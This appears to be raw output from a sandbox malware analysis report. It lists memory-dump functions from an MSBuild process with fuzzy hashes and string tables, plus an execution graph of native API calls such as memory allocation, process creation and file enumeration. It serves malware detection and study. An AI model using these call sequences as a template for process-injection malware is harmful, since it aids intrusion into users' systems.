                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 80a269f427a4c4bebbae369fe4f876779ecf87d57512c94b96ed7ee988152f29
                                                                                                              • Instruction ID: 4962ffdfa3a5e950f48f101f6035ce07fdde549bf8fb735b49b081b968394f44
                                                                                                              • Opcode Fuzzy Hash: 80a269f427a4c4bebbae369fe4f876779ecf87d57512c94b96ed7ee988152f29
                                                                                                              • Instruction Fuzzy Hash: EF510775A00645AFCB39DF9CC8909BFFBF8EB68604B04845EE496D7681E7B4DA00C760
                                                                                                              Function 01147630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01184725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01184742
                                                                                                              • Execute=1, xrefs: 01184713
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011846FC
                                                                                                              • ExecuteOptions, xrefs: 011846A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01184787
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01184655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                              • Instruction ID: 015e8402014db4257767a5bfd377175e3b3212813b58c56944d56ea466bf8a96
                                                                                                              • Opcode Fuzzy Hash: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                              • Instruction Fuzzy Hash: 0A514B31A0021ABBFF2DEBA9EC99FAD77B9EF14704F040099D605AB1C1DB709A418F51
                                                                                                              Function 011E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                              • Instruction ID: 55f9e358d93c4f78430d27cef3e32dee3d052fb0daefec25f9094711b6c7410e
                                                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                              • Instruction Fuzzy Hash: 65023571508742AFD309CF58C898A6FBBE5EFD8704F44892DF9994B260DB31E944CB82
                                                                                                              Function 0115B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 8fdf0b5202b7dda7da6ae8ee1bbbe6158207376da38c583602b52ac17e136510
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 7F819E70E09649DEEFAD8E6CC8917FEBBA3AF45320F184159DC71A72D1C73498408B69
                                                                                                              Function 011C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 473cfa402010828cb2889459e3d7ba88a1481c4ada55364fb6984e1aeaddc5b4
                                                                                                              • Instruction ID: e9094ccc965acb03d6966a6211f7b36799b40d426106aa1ab8b3ca6524e89431
                                                                                                              • Opcode Fuzzy Hash: 473cfa402010828cb2889459e3d7ba88a1481c4ada55364fb6984e1aeaddc5b4
                                                                                                              • Instruction Fuzzy Hash: 2A21777AE00119ABDB19DF79DC40AFEBBF8EFA4A44F04011AED15D3240E771D9018BA1
                                                                                                              Function 0113F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 0118031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011802BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011802E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                              • Instruction ID: 72c791cef63d21f8b8028aaa83937401a4c40e366569862693f25b96a7e3b515
                                                                                                              • Opcode Fuzzy Hash: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                              • Instruction Fuzzy Hash: FFE19E70A087469FD72DDF28C884B2ABBE1BB88314F144A5DF5A58B2E1D774D845CB43
                                                                                                              Function 0114BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 01187BAC
                                                                                                              • RTL: Resource at %p, xrefs: 01187B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01187B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                              • Instruction ID: 68e5fb449c3bc961312b56841d0ec6fd75d7e9aefbebd4f46276dabea795b57f
                                                                                                              • Opcode Fuzzy Hash: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                              • Instruction Fuzzy Hash: 8541F6353057029FD728DE29C840B6AB7E5EF94B10F100A1DFA9ADB680D731E8058F96
                                                                                                              Function 0114B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0118728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 011872C1
                                                                                                              • RTL: Resource at %p, xrefs: 011872A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01187294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                              • Instruction ID: cff1f52c6011afc80762ef8819b491133c156157223ccc58ffa8a015fa7c860e
                                                                                                              • Opcode Fuzzy Hash: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                              • Instruction Fuzzy Hash: 9E413531704202ABC718DE29CC41B66BBA5FF54714F244619F995DB680DB30E842CBD1
                                                                                                              Function 011C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 85b0a001f1650a5112a85ff69777e9c72c41eff187cbc4c8c9f1fcb5bd812089
                                                                                                              • Instruction ID: 0d4600470a4c701a55dc38ff6ca971ad8be7b738369fae457717f13afce40e5e
                                                                                                              • Opcode Fuzzy Hash: 85b0a001f1650a5112a85ff69777e9c72c41eff187cbc4c8c9f1fcb5bd812089
                                                                                                              • Instruction Fuzzy Hash: 91319A72A001199FDB24DF2DCC40BEEB7F8FF58610F44059AE949D3140EB309A548B60
                                                                                                              Function 01157D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 5a64cdd0b6003b9d240749848ae3f0afd7f73d0bfb603de1de26c569fad14b6c
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: 6E91B271E00216DFEBACDF6DC8826BEBBA5EF44320F94451AED75A72C0D73089418752
                                                                                                              Function 01119126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                              • Instruction ID: 011b887749d82ecaba7eb643440b52c1dbb8140952e8294141f708ddcbaa0e49
                                                                                                              • Opcode Fuzzy Hash: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                              • Instruction Fuzzy Hash: 66811C71D002699BDB39DB54CC44BEEBBB8AF48754F0041EAEA19B7280D7705E85CFA1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.5%
                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                              Signature Coverage:2.1%
                                                                                                              Total number of Nodes:479
                                                                                                              Total number of Limit Nodes:79
                                                                                                              execution_graph 100200 4b2688 100203 4b61f0 100200->100203 100202 4b26b3 100204 4b6223 100203->100204 100205 4b6247 100204->100205 100210 4c8fc0 100204->100210 100205->100202 100207 4b626a 100207->100205 100214 4c9480 100207->100214 100209 4b62ea 100209->100202 100211 4c8fda 100210->100211 100217 2db2ca0 LdrInitializeThunk 100211->100217 100212 4c9006 100212->100207 100215 4c949d 100214->100215 100216 4c94ae NtClose 100215->100216 100216->100209 100217->100212 100218 4c1a48 100221 4c59b0 100218->100221 100220 4c1a66 100222 4c5a15 100221->100222 100223 4c5a50 100222->100223 100226 4c1390 100222->100226 100223->100220 100225 4c5a32 100225->100220 100227 4c1337 100226->100227 100228 4c9480 NtClose 100227->100228 100229 4c137f 100227->100229 100228->100229 100229->100225 100230 4c1a09 100231 4c1a0f 100230->100231 100232 4c9480 NtClose 100231->100232 100234 4c1a14 100231->100234 100233 4c1a39 100232->100233 100235 4a9e80 100236 4a9e8f 100235->100236 100237 4a9ed0 100236->100237 100238 4a9ebd CreateThread 100236->100238 100239 2db2ad0 LdrInitializeThunk 100240 4b7240 100241 4b72af 100240->100241 100242 4b7255 100240->100242 100242->100241 100244 4bb1c0 100242->100244 100245 4bb1e6 100244->100245 100246 4bb416 100245->100246 100271 4c98a0 100245->100271 100246->100241 100248 4bb25c 100248->100246 100274 4cc750 100248->100274 100250 4bb27b 100250->100246 100251 4bb34f 100250->100251 100280 4c8a70 100250->100280 100253 4b5a70 LdrInitializeThunk 100251->100253 100255 4bb36e 100251->100255 100253->100255 100257 4bb3fe 100255->100257 100291 4c85e0 100255->100291 100256 4bb337 100287 4b8040 100256->100287 100265 4b8040 LdrInitializeThunk 100257->100265 100259 4bb315 100306 4c46f0 LdrInitializeThunk 100259->100306 100260 4bb2e3 100260->100246 100260->100256 100260->100259 100284 4b5a70 100260->100284 100267 4bb40c 100265->100267 100266 4bb3d5 100296 4c8690 100266->100296 100267->100241 100269 4bb3ef 100301 4c87f0 100269->100301 100272 4c98ba 100271->100272 100273 4c98cb CreateProcessInternalW 100272->100273 100273->100248 100275 4cc6c0 100274->100275 100278 4cc71d 100275->100278 100307 4cb660 100275->100307 100277 4cc6fa 100310 4cb580 100277->100310 100278->100250 100281 4c8a8a 100280->100281 100319 2db2c0a 100281->100319 100282 4bb2da 100282->100251 100282->100260 100285 4b5aae 100284->100285 100322 4c8c40 100284->100322 100285->100259 100288 4b8053 100287->100288 100328 4c8970 100288->100328 100290 4b807e 100290->100241 100292 4c8660 100291->100292 100294 4c860e 100291->100294 100334 2db39b0 LdrInitializeThunk 100292->100334 100293 4c8685 100293->100266 100294->100266 100297 4c8710 100296->100297 100299 4c86be 100296->100299 100335 2db4340 LdrInitializeThunk 100297->100335 100298 4c8735 100298->100269 100299->100269 100302 4c886d 100301->100302 100303 4c881b 100301->100303 100336 2db2fb0 LdrInitializeThunk 100302->100336 100303->100257 100304 4c8892 100304->100257 100306->100256 100313 4c97c0 100307->100313 100309 4cb678 100309->100277 100316 4c9810 100310->100316 100312 4cb596 100312->100278 100314 4c97dd 100313->100314 100315 4c97ee RtlAllocateHeap 100314->100315 100315->100309 100317 4c982d 100316->100317 100318 4c983e RtlFreeHeap 100317->100318 100318->100312 100320 2db2c1f LdrInitializeThunk 100319->100320 100321 2db2c11 100319->100321 100320->100282 100321->100282 100323 4c8cf1 100322->100323 100325 4c8c6f 100322->100325 100327 2db2d10 LdrInitializeThunk 100323->100327 100324 4c8d36 100324->100285 100325->100285 100327->100324 100329 4c89ee 100328->100329 100331 4c899b 100328->100331 100333 2db2dd0 LdrInitializeThunk 100329->100333 100330 4c8a13 100330->100290 100331->100290 100333->100330 100334->100293 100335->100298 100336->100304 100337 4b0cc0 100338 4b0ccd 100337->100338 100343 4b4470 100338->100343 100340 4b0cf8 100341 4b0d2c PostThreadMessageW 100340->100341 100342 4b0d3d 100340->100342 100341->100342 100346 4b4494 100343->100346 100344 4b449b 100344->100340 100345 4b44ba 100348 4b44d0 LdrLoadDll 100345->100348 100349 4b44e7 100345->100349 100346->100344 100346->100345 100350 4cca00 LdrLoadDll 100346->100350 100348->100349 100349->100340 100350->100345 100351 4b6cc0 100352 4b6cea 100351->100352 100355 4b7e70 100352->100355 100354 4b6d11 100356 4b7e8d 100355->100356 100362 4c8b60 100356->100362 100358 4b7edd 100359 4b7ee4 100358->100359 100360 4c8c40 LdrInitializeThunk 100358->100360 100359->100354 100361 4b7f0d 100360->100361 100361->100354 100363 4c8b8b 100362->100363 100364 4c8bfb 100362->100364 100363->100358 100367 2db2f30 LdrInitializeThunk 100364->100367 100365 4c8c34 100365->100358 100367->100365 100368 4b21c0 100369 4c8a70 LdrInitializeThunk 100368->100369 100370 4b21f6 100369->100370 100373 4c9520 100370->100373 100372 4b220b 100374 4c95af 100373->100374 100375 4c954b 100373->100375 100378 2db2e80 LdrInitializeThunk 100374->100378 100375->100372 100376 4c95e0 100376->100372 100378->100376 100379 4c1a80 100380 4c1a99 100379->100380 100381 4c1ae1 100380->100381 100384 4c1b1e 100380->100384 100386 4c1b23 100380->100386 100382 4cb580 RtlFreeHeap 100381->100382 100383 4c1aee 100382->100383 100385 4cb580 RtlFreeHeap 100384->100385 100385->100386 100387 4cc680 100388 4cb580 RtlFreeHeap 100387->100388 100389 4cc695 100388->100389 100395 4c1281 100396 4c1287 100395->100396 100408 4c92d0 100396->100408 100398 4c12a2 100399 4c12d5 100398->100399 100400 4c12c0 100398->100400 100402 4c9480 NtClose 100399->100402 100401 4c9480 NtClose 100400->100401 100403 4c12c9 100401->100403 100405 4c12de 100402->100405 100404 4c1315 100405->100404 100406 4cb580 RtlFreeHeap 100405->100406 100407 4c1309 100406->100407 100409 4c937a 100408->100409 100411 4c92fe 100408->100411 100410 4c9390 NtReadFile 100409->100410 100410->100398 100411->100398 100412 4b3013 100417 4b7cc0 100412->100417 100415 4b303f 100416 4c9480 NtClose 100416->100415 100418 4b3023 100417->100418 100419 4b7cda 100417->100419 100418->100415 100418->100416 100423 4c8b10 100419->100423 100422 4c9480 NtClose 100422->100418 100424 4c8b2d 100423->100424 100427 2db35c0 LdrInitializeThunk 100424->100427 100425 4b7daa 100425->100422 100427->100425 100428 4b82d2 GetFileAttributesW 100429 4b82e3 100428->100429 100430 4bac90 100435 4ba9a0 100430->100435 100432 4bac9d 100447 4ba620 100432->100447 100434 4bacb9 100437 4ba9c5 100435->100437 100436 4bab10 100436->100432 100437->100436 100457 4c32c0 100437->100457 100439 4bab27 100439->100432 100440 4bab1e 100440->100439 100442 4bac15 100440->100442 100472 4ba070 100440->100472 100444 4bac7a 100442->100444 100481 4ba3e0 100442->100481 100445 4cb580 RtlFreeHeap 100444->100445 100446 4bac81 100445->100446 100446->100432 100448 4ba633 100447->100448 100451 4ba63e 100447->100451 100449 4cb660 RtlAllocateHeap 100448->100449 100449->100451 100450 4ba662 100450->100434 100451->100450 100452 4ba972 100451->100452 100455 4ba070 RtlFreeHeap 100451->100455 100456 4ba3e0 RtlFreeHeap 100451->100456 100453 4ba988 100452->100453 100454 4cb580 RtlFreeHeap 100452->100454 100453->100434 100454->100453 100455->100451 100456->100451 100458 4c32ce 100457->100458 100459 4c32d5 100457->100459 100458->100440 100460 4b4470 2 API calls 100459->100460 100461 4c330a 100460->100461 100462 4c3319 100461->100462 100485 4c2d80 LdrLoadDll LdrLoadDll 100461->100485 100464 4cb660 RtlAllocateHeap 100462->100464 100468 4c34c7 100462->100468 100465 4c3332 100464->100465 100466 4c34bd 100465->100466 100465->100468 100469 4c334e 100465->100469 100467 4cb580 RtlFreeHeap 100466->100467 100466->100468 100467->100468 100468->100440 100469->100468 100470 4cb580 RtlFreeHeap 100469->100470 100471 4c34b1 100470->100471 100471->100440 100473 4ba096 100472->100473 100486 4bdab0 100473->100486 100475 4ba108 100476 4ba290 100475->100476 100477 4ba126 100475->100477 100478 4ba275 100476->100478 100479 4b9f30 RtlFreeHeap 100476->100479 100477->100478 100491 4b9f30 100477->100491 100478->100440 100479->100476 100482 4ba406 100481->100482 100483 4bdab0 RtlFreeHeap 100482->100483 100484 4ba48d 100483->100484 100484->100442 100485->100462 100488 4bdad4 100486->100488 100487 4bdae1 100487->100475 100488->100487 100489 4cb580 RtlFreeHeap 100488->100489 100490 4bdb24 100489->100490 100490->100475 100492 4b9f4d 100491->100492 100495 4bdb40 100492->100495 100494 4ba053 100494->100477 100496 4bdb64 100495->100496 100497 4bdc0e 100496->100497 100498 4cb580 RtlFreeHeap 100496->100498 100497->100494 100498->100497 100504 4c6cd0 100505 4c6d35 100504->100505 100506 4c6d60 100505->100506 100509 4c0a00 100505->100509 100508 4c6d42 100510 4c0a0f 100509->100510 100514 4c07b0 100509->100514 100511 4c09ec 100511->100508 100512 4b6300 LdrInitializeThunk 100512->100514 100513 4c8f10 LdrInitializeThunk 100513->100514 100514->100511 100514->100512 100514->100513 100515 4c9480 NtClose 100514->100515 100515->100514 100516 4c93d0 100517 4c944a 100516->100517 100519 4c93fe 100516->100519 100518 4c9460 NtDeleteFile 100517->100518 100520 4ab414 100522 4aca81 100520->100522 100523 4cb4f0 100520->100523 100526 4c95f0 100523->100526 100525 4cb521 100525->100522 100527 4c9688 100526->100527 100529 4c961e 100526->100529 100528 4c969e NtAllocateVirtualMemory 100527->100528 100528->100525 100529->100525 100530 4a9ee0 100533 4aa065 100530->100533 100531 4aa2d1 100533->100531 100534 4cb1e0 100533->100534 100535 4cb206 100534->100535 100540 4a4120 100535->100540 100537 4cb212 100539 4cb24b 100537->100539 100543 4c5570 100537->100543 100539->100531 100547 4b3120 100540->100547 100542 4a412d 100542->100537 100544 4c55d2 100543->100544 100546 4c55df 100544->100546 100558 4b18f0 100544->100558 100546->100539 100548 4b313a 100547->100548 100550 4b3150 100548->100550 100551 4c9f00 100548->100551 100550->100542 100552 4c9f1a 100551->100552 100553 4c9f49 100552->100553 100554 4c8a70 LdrInitializeThunk 100552->100554 100553->100550 100555 4c9fa9 100554->100555 100556 4cb580 RtlFreeHeap 100555->100556 100557 4c9fc2 100556->100557 100557->100550 100559 4b192b 100558->100559 100574 4b7dd0 100559->100574 100561 4b1933 100562 4cb660 RtlAllocateHeap 100561->100562 100573 4b1c16 100561->100573 100563 4b1949 100562->100563 100564 4cb660 RtlAllocateHeap 100563->100564 100565 4b195a 100564->100565 100566 4cb660 RtlAllocateHeap 100565->100566 100568 4b196b 100566->100568 100569 4b1a02 100568->100569 100589 4b6950 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100568->100589 100570 4b4470 2 API calls 100569->100570 100571 4b1bc2 100570->100571 100585 4c7eb0 100571->100585 100573->100546 100575 4b7dfc 100574->100575 100576 4b7cc0 2 API calls 100575->100576 100577 4b7e1f 100576->100577 100578 4b7e29 100577->100578 100579 4b7e41 100577->100579 100580 4b7e34 100578->100580 100582 4c9480 NtClose 100578->100582 100581 4b7e5d 100579->100581 100583 4c9480 NtClose 100579->100583 100580->100561 100581->100561 100582->100580 100584 4b7e53 100583->100584 100584->100561 100586 4c7f12 100585->100586 100588 4c7f1f 100586->100588 100590 4b1c30 100586->100590 100588->100573 100589->100569 100593 4b1c50 100590->100593 100606 4b80a0 100590->100606 100592 4b21b0 100592->100588 100593->100592 100610 4c10c0 100593->100610 100596 4b1e75 100597 4cc750 2 API calls 100596->100597 100600 4b1e8a 100597->100600 100598 4b1cae 100598->100592 100613 4cc620 100598->100613 100599 4b8040 LdrInitializeThunk 100602 4b1eda 100599->100602 100600->100602 100618 4b0750 100600->100618 100602->100592 100602->100599 100603 4b0750 LdrInitializeThunk 100602->100603 100603->100602 100604 4b2030 100604->100602 100605 4b8040 LdrInitializeThunk 100604->100605 100605->100604 100607 4b80ad 100606->100607 100608 4b80ce SetErrorMode 100607->100608 100609 4b80d5 100607->100609 100608->100609 100609->100593 100611 4cb4f0 NtAllocateVirtualMemory 100610->100611 100612 4c10e1 100611->100612 100612->100598 100614 4cc636 100613->100614 100615 4cc630 100613->100615 100616 4cb660 RtlAllocateHeap 100614->100616 100615->100596 100617 4cc65c 100616->100617 100617->100596 100619 4b076c 100618->100619 100622 4c9720 100619->100622 100623 4c973a 100622->100623 100626 2db2c70 LdrInitializeThunk 100623->100626 100624 4b0772 100624->100604 100626->100624 100627 4b7060 100628 4b7079 100627->100628 100635 4b70cc 100627->100635 100630 4c9480 NtClose 100628->100630 100628->100635 100629 4b7204 100631 4b7094 100630->100631 100637 4b6480 NtClose LdrInitializeThunk LdrInitializeThunk 100631->100637 100633 4b71de 100633->100629 100639 4b6650 NtClose LdrInitializeThunk LdrInitializeThunk 100633->100639 100635->100629 100638 4b6480 NtClose LdrInitializeThunk LdrInitializeThunk 100635->100638 100637->100635 100638->100633 100639->100629 100641 4c8a20 100642 4c8a3d 100641->100642 100645 2db2df0 LdrInitializeThunk 100642->100645 100643 4c8a65 100645->100643 100646 4c88a0 100647 4c892f 100646->100647 100648 4c88cb 100646->100648 100651 2db2ee0 LdrInitializeThunk 100647->100651 100649 4c8960 100651->100649 100652 4c9160 100653 4c921a 100652->100653 100655 4c9192 100652->100655 100654 4c9230 NtCreateFile 100653->100654 100656 4b8767 100657 4b876a 100656->100657 100658 4b8721 100657->100658 100660 4b6fe0 100657->100660 100661 4b702f 100660->100661 100662 4b6ff6 100660->100662 100661->100658 100662->100661 100664 4b6e50 LdrLoadDll LdrLoadDll 100662->100664 100664->100661 100665 4c5fe0 100666 4c603a 100665->100666 100668 4c6047 100666->100668 100669 4c39e0 100666->100669 100670 4cb4f0 NtAllocateVirtualMemory 100669->100670 100671 4c3a1e 100670->100671 100672 4b4470 2 API calls 100671->100672 100675 4c3b2e 100671->100675 100673 4c3a64 100672->100673 100674 4c3ab0 Sleep 100673->100674 100673->100675 100674->100673 100675->100668 100676 4b9b7b 100678 4b9b80 100676->100678 100677 4b9ba9 100678->100677 100679 4cb580 RtlFreeHeap 100678->100679 100679->100677 100680 4b5af0 100681 4b8040 LdrInitializeThunk 100680->100681 100682 4b5b20 100680->100682 100681->100682 100684 4b5b4c 100682->100684 100685 4b7fc0 100682->100685 100686 4b8004 100685->100686 100691 4b8025 100686->100691 100692 4c8740 100686->100692 100688 4b8015 100689 4b8031 100688->100689 100690 4c9480 NtClose 100688->100690 100689->100682 100690->100691 100691->100682 100693 4c87c0 100692->100693 100694 4c876e 100692->100694 100697 2db4650 LdrInitializeThunk 100693->100697 100694->100688 100695 4c87e5 100695->100688 100697->100695 100699 4bc530 100701 4bc559 100699->100701 100700 4bc65d 100701->100700 100702 4bc603 FindFirstFileW 100701->100702 100702->100700 100703 4bc61e 100702->100703 100704 4bc644 FindNextFileW 100703->100704 100704->100703 100705 4bc656 FindClose 100704->100705 100705->100700 100707 4bf7b0 100708 4bf814 100707->100708 100709 4b61f0 2 API calls 100708->100709 100711 4bf947 100709->100711 100710 4bf94e 100711->100710 100738 4b6300 100711->100738 100715 4bf9ee 100716 4bfb02 100715->100716 100747 4bf590 100715->100747 100717 4c9480 NtClose 100716->100717 100719 4bfb0c 100717->100719 100720 4bfa06 100720->100716 100721 4bfa11 100720->100721 100722 4cb660 RtlAllocateHeap 100721->100722 100723 4bfa3a 100722->100723 100724 4bfa59 100723->100724 100725 4bfa43 100723->100725 100756 4bf480 CoInitialize 100724->100756 100726 4c9480 NtClose 100725->100726 100728 4bfa4d 100726->100728 